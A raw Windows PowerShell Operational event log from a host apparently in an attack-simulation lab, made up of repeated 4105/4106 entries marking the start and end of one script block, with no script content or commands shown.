06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473034
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473033
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473032
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473031
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473030
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473029
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473028
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473027
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473026
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473025
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473024
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473023
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473022
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473021
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473020
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473019
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473018
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473017
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473016
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473015
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473014
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473013
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473012
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473011
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473010
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473009
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473008
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473007
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473006
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473005
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473004
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473003
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473002
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473001
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473000
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472999
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472998
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472997
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472996
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472995
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472994
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472993
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472992
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472991
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472990
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472989
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472988
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472987
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472986
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472985
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472984
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472983
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472982
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472981
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472980
Keywords=None
